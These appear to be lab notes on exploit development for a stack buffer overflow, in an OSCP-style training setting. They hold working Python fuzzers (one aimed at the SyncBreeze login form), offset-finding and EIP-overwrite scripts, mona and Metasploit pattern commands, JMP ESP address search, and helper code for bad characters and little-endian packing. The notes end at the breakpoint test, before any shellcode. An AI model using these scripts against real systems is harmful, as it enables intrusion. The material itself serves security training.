Restart ImmunityDbgr (Debug > Restart) after every crash.
This step outputs the approximate number of bytes at which the crash occurred.
#!/usr/bin/python
import sys, socket
from time import sleep

ip = "10.10.85.137"
port = 1337
prefix = "OVERFLOW2 "
buffer = "A" * 100
#timeout = 5

while True:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # s.settimeout(timeout)
        s.connect((ip, port))
        s.recv(1024)
        print "Fuzzing with %s bytes..." % str(len(buffer))
        s.send((prefix + buffer))
        s.recv(1024)
        s.close()
    except:
        # connect/recv fails once the service has crashed
        print "Fuzzing crashed at %s bytes" % str(len(buffer))
        sys.exit()
    buffer = buffer + "A" * 100
    sleep(1)
----------------------------------------------------------------------------------------
#!/usr/bin/python
import sys, socket
from time import sleep

ip = "10.10.85.137"
port = 31337
size = 100
#buffer = "A" * 100 + "\n"
#timeout = 5

while True:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, port))
        buffer = "A" * size + "\n"
        print "\nFuzzing with %s bytes..." % size
        s.send(buffer)
        s.close()
        size += 100
        sleep(3)
    except:
        print "Exited!! Fuzzing crashed at %s bytes" % size
        sys.exit()
----------------
#HTTP Service: Syncbreeze
#!/usr/bin/python
import sys, socket
from time import sleep

ip = "192.168.174.10"
port = 80
buffer = "A" * 100

while True:
    try:
        content = "username=" + buffer + "&password=A"
        req = "POST /login HTTP/1.1\r\n"
        req += "Host: 192.168.174.10\r\n"
        req += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\r\n"
        req += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
        req += "Accept-Language: en-US,en;q=0.5\r\n"
        req += "Accept-Encoding: gzip, deflate\r\n"
        req += "Content-Type: application/x-www-form-urlencoded\r\n"
        req += "Content-Length: " + str(len(content)) + "\r\n"
        req += "Origin: http://192.168.174.10\r\n"
        req += "Connection: close\r\n"
        req += "Referer: http://192.168.174.10/login\r\n"
        req += "Upgrade-Insecure-Requests: 1\r\n"
        req += "\r\n"
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, port))
        print "Fuzzing with %s bytes..." % str(len(buffer))
        s.send((req + content))
        s.close()
        sleep(10)
        buffer = buffer + "A" * 100
    except:
        print "Connection error! Fuzzing crashed at %s bytes" % str(len(buffer))
        sys.exit()
Finding the Offset
The goal is to identify the value that lands in EIP at the crash; that value reveals the offset.
#Create pattern
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <No: of bytes from fuzz.py>
msf-pattern_create -l 2000
#find_offset.py
#!/usr/bin/python
import sys, socket

ip = "10.10.85.137"
port = 1337
prefix = "OVERFLOW2 "
offset = "<Insert created pattern here>"

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    s.send((prefix + offset))
    s.close()
except:
    print "Error connecting to server"
    sys.exit()
chmod +x find_offset.py; ./find_offset.py
Once crash occurs, take note of the value of the EIP register within Immunity Debugger.
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l <No: of bytes from fuzz.py> -q <Value of EIP register in Immunity Dbgr at crash>
msf-pattern_offset -q <Value of EIP register in Immunity Dbgr at crash>
This prints the exact offset: that many bytes precede EIP in the buffer, and the 4 bytes that follow land in EIP itself.
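To make the pattern_create / pattern_offset step concrete, here is an added Python 3 example (not Metasploit's own code, and not part of these notes) that reimplements the same cyclic-pattern idea: a pattern of upper-lower-digit triplets in which any 4-byte window is unique, and a lookup that accepts either the literal text or the hex EIP value and accounts for x86 little-endian byte order. The offset 634 used in the scripts is the value the example is checked against.

```python
import re
import string
import struct

# Hypothetical reimplementation of the pattern_create / pattern_offset
# logic used in the notes. Not Metasploit's code.

def pattern_create(length):
    """Cyclic pattern of 'length' bytes: Aa0Aa1Aa2 ... Ab0Ab1 ... Zz9.
    The full cycle is 26*26*10 triplets = 20280 bytes; every 4-byte
    window inside it is unique, so 4 bytes pin down one position."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(query, length=20280):
    """Find 'query' in the pattern and return its offset (-1 if absent).
    'query' is either the literal text seen in memory ("Aa0A") or the
    8-hex-digit value the debugger shows for EIP ("0x41306141"). A hex
    value is the register's little-endian view of 4 consecutive bytes,
    so it is unpacked back into memory order before searching.
    Caveat: an 8-character literal made only of hex digits (e.g. "0Aa1Aa2A")
    is indistinguishable from a hex value and is treated as one."""
    if re.fullmatch(r"(0x)?[0-9a-fA-F]{8}", query):
        needle = struct.pack("<I", int(query, 16)).decode("ascii")
    else:
        needle = query
    return pattern_create(length).find(needle)
```

Usage mirrors the notes: `pattern_create(2000)` replaces `msf-pattern_create -l 2000`, and `pattern_offset("0x76413176")` plays the part of `msf-pattern_offset -q 76413176`.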
Over-writing the EIP
The goal is to overwrite the 4 bytes of EIP.
We confirm this by filling the buffer up to the offset and overwriting EIP with four 'B's [42424242].
#overwrite_eip.py
#!/usr/bin/python
import sys, socket

ip = "10.10.155.133"
port = 1337
prefix = "OVERFLOW2 "
offset = 634
shellcode = "A" * offset + "B" * 4

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    s.send((prefix + shellcode))
    s.close()
except:
    print "Error connecting to server"
    sys.exit()
Finding Bad Characters
Generate a bytearray using mona and note the location of the bytearray.bin file it writes.
Make a note of the address the ESP register points to [eg: 0022F930] and use it in the following mona command:
Refer to this guide on how to remove bad characters with Mona.
!mona compare -f C:\mona\bytearray.bin -a <ESP value>
#Identify the bad character and remove it from the Python script above.
#Repeat for each bad character identified until all are removed.
#Generate a new byte array
!mona bytearray -b "\x00<identified bad chars>"   #no comma separators
!mona compare -f C:\mona\oscp\bytearray.bin -a <new ESP value>
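The bad-character loop above (send every byte value, compare what reached memory at ESP, drop the first corrupted byte, repeat) can be checked offline. The following Python 3 example is added here and is not mona's code; the `fake_target` function is a constructed stand-in for the crash-and-dump round trip, modelling a parser that stops at 0x0a and rewrites 0x0d to 0x20, so the iteration can be seen converging.

```python
# Added example (not mona's code): bytearray generation and the
# '!mona compare' style check from the bad-character step.

def bytearray_without(badchars):
    """All byte values 0x00..0xff except those in 'badchars'
    (0x00 is dropped from the start, as with '-b "\\x00"' above)."""
    return bytes(b for b in range(256) if b not in badchars)


def as_python_literal(data):
    """Render bytes in the "\\x.." form used in the exploit scripts."""
    return "".join("\\x%02x" % b for b in data)


def first_mismatch(expected, observed):
    """Emulate '!mona compare': walk the bytes we sent against the bytes
    found in memory at ESP; return the first sent byte that was altered
    or truncated, or None when memory matches what was sent."""
    for i, want in enumerate(expected):
        if i >= len(observed) or observed[i] != want:
            return want
    return None


def find_badchars(send_fn, badchars=(0,)):
    """The loop from the notes: send the remaining characters, take the
    first corruption as a new bad character, regenerate and repeat until
    the dump matches. 'send_fn' stands in for the crash/dump round trip."""
    bad = set(badchars)
    while True:
        payload = bytearray_without(bad)
        culprit = first_mismatch(payload, send_fn(payload))
        if culprit is None:
            return sorted(bad)
        bad.add(culprit)


def fake_target(payload):
    """Constructed target behaviour for this example only: input is cut at
    the first 0x0a and every 0x0d is rewritten to 0x20 (a space)."""
    cut = payload.split(b"\x0a", 1)[0]
    return cut.replace(b"\x0d", b"\x20")


if __name__ == "__main__":
    found = find_badchars(fake_target)
    print("bad chars:", as_python_literal(bytes(found)))
    print("clean bytearray length:", len(bytearray_without(found)))
```

Note that a byte which is dropped (rather than rewritten) shifts everything after it, so `first_mismatch` still reports the dropped byte itself, not the byte that moved into its slot. That is the reason the notes insist on removing one character at a time and regenerating the array.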
Finding a Jump Point
The goal is to identify locations in memory that hold the instruction 'JMP ESP' and whose addresses do not change when the program is restarted.
Potential targets: a DLL used by the vulnerable program that has no memory protections [eg: ASLR etc].
Use mona.py within ImmunityDbgr to help identify the appropriate DLL.
Check the results against any bad characters found in the previous step. For example, if 0x62 was a bad character, every address in these results contains '0x62', so a different module would have to be used. [Vuln server example]
!mona jmp -r esp -cpb "\x00<other bad chars if any>"
---------Alternatively-----------
--Type within Immunity Dbgr > Left-Bottom text box
!mona modules
--Look for DLLs without protections ("False")
--Find the opcode equivalent of a jump
--To find the opcode equivalent of JMP ESP:
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
JMP ESP
#Find the return address for EIP
#Type within Immunity Dbgr > Left-Bottom text box
!mona find -s "\xff\xe4" -m <Potentialfile.dll>
!mona find -s "\xff\xe4" -m <vulnservice.exe>
#This will output a few return addresses. We will need to test whether these get us to the EIP breakpoint.
-----------------------------------------------------------------------------------------
#Modify the script to jump to the pointer. Note: enter the address in reverse [little-endian format for x86] (Eg: 0x625011af > \xaf\x11\x50\x62)
#!/usr/bin/python
import sys, socket

ip = "10.10.223.90"
port = 1337
prefix = "OVERFLOW2 "
offset = 634
buffer = "A" * offset + "\xaf\x11\x50\x62"

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    s.send((prefix + buffer))
    s.close()
except:
    print "Error connecting to server"
    sys.exit()
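Hand-reversing the address is where mistakes creep in, so here is an added Python 3 example (not part of the notes) that builds the same buffer from the numeric address with `struct.pack`, refuses an address containing a bad character (the check `-cpb` performs), and shows what EIP will read back so the result can be compared with the debugger before anything is sent. The prefix, offset 634 and address 0x625011af are the values from the script above.

```python
import struct

# Added example: build the EIP-overwrite buffer from a numeric address
# instead of a hand-typed little-endian string.

def pack_address(addr):
    """32-bit little-endian encoding: 0x625011af -> b'\\xaf\\x11\\x50\\x62'."""
    return struct.pack("<I", addr)


def address_is_clean(addr, badchars):
    """A return address is only usable if none of its four bytes is a bad
    character; this is the filtering '!mona jmp -r esp -cpb ...' does."""
    return not any(b in badchars for b in pack_address(addr))


def build_payload(prefix, offset, addr, badchars=(0,)):
    """prefix + 'A' * offset + little-endian address. Raises instead of
    sending an address that a bad character would corrupt in transit."""
    if not address_is_clean(addr, badchars):
        raise ValueError("address 0x%08x contains a bad character" % addr)
    return prefix.encode() + b"A" * offset + pack_address(addr)


def eip_value(payload, prefix, offset):
    """The value EIP will hold, formatted as the debugger displays it."""
    start = len(prefix) + offset
    return "0x%08x" % struct.unpack("<I", payload[start:start + 4])[0]


if __name__ == "__main__":
    p = build_payload("OVERFLOW2 ", 634, 0x625011af)
    print(len(p), "bytes; EIP ->", eip_value(p, "OVERFLOW2 ", 634))
```

If `eip_value` does not print the address chosen from the mona output, the offset is wrong, not the address; recheck the pattern_offset step before changing the jump target.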
Test if we reach the jump-point
Set breakpoint on the address by pressing F2.
Within ImmunityDbgr: Enter Expression to follow (Eg: 625011af ) > Hit 'F2', or:
bp 0x625011af
ImmunityDbgr: EIP should be at breakpoint if it ran successfully.